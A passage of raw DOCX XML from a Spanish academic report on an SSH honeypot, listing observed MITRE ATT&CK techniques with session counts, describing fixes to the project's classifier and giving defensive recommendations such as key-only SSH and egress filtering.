            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1110.001 Brute Force: Password Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10 517</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1078.003 Valid Accounts: Local Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2 060</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1059.004 Command and Scripting Interpreter: Unix Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 553</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">764</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1222.002 File and Directory Permissions Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">604</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1098.004 Account Manipulation: SSH Authorized Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1497.001 Virtualization/Sandbox Evasion: System Checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">203</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1090 Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">56</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1496.001 Resource Hijacking: Compute Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1005 Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 18. Técnicas MITRE ATT&amp;CK más relevantes por táctica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK observadas (sesiones por técnica)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762500" cy="44291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4429125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los datos reales obligaron a ampliar el clasificador. Siete técnicas no estaban previstas en las reglas iniciales (entre ellas T1497.001, T1090, T1005 y T1552.003), y se detectó un falso positivo: listar el directorio /var/log se clasificaba como borrado de registros (T1070.002). Tras los cambios, los comandos sin técnica asignada pasaron de 508 a 40 y el conjunto de pruebas automáticas creció de 33 a 50 casos, todos superados. También se corrigió el análisis de ficheros: Cowrie registra como descarga cualquier contenido escrito con una redirección (echo … &gt; fichero), de modo que las 623 «descargas» iniciales eran en su mayoría claves SSH y scripts escritos por los bots; ahora se agrupan por hash y se distingue el tipo de origen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Primeras Conclusiones Defensivas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Casi toda la actividad observada se habría neutralizado con tres medidas que no requieren herramientas comerciales, y que coinciden con las mitigaciones de ATT&amp;CK asociadas a cada técnica:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Autenticación SSH solo con clave y sin acceso como root (M1032, M1026): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">anula la fuerza bruta, que supone el 76 % de las sesiones, y es la configuración aplicada al SSH real del proyecto en el puerto 2022.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Control de integridad sobre authorized_keys (M1022): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">detectaría la persistencia de Outlaw, la campaña más extendida.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtrado del tráfico saliente y AllowTcpForwarding no (M1037, M1042): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">impide la descarga de herramientas, la conexión del minero con su pool y el uso del servidor como proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Estas conclusiones se basan en tres días de datos y se revisarán con el periodo completo de captura, ya que las campañas aparecen y desaparecen y algunas pueden no haberse manifestado todavía.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trabajos Futuros</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El proyecto sienta las bases para diversas líneas de ampliación y mejora que podrían desarrollarse como continuación de este trabajo, como proyecto de Máster o como implementación profesional en un entorno corporativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
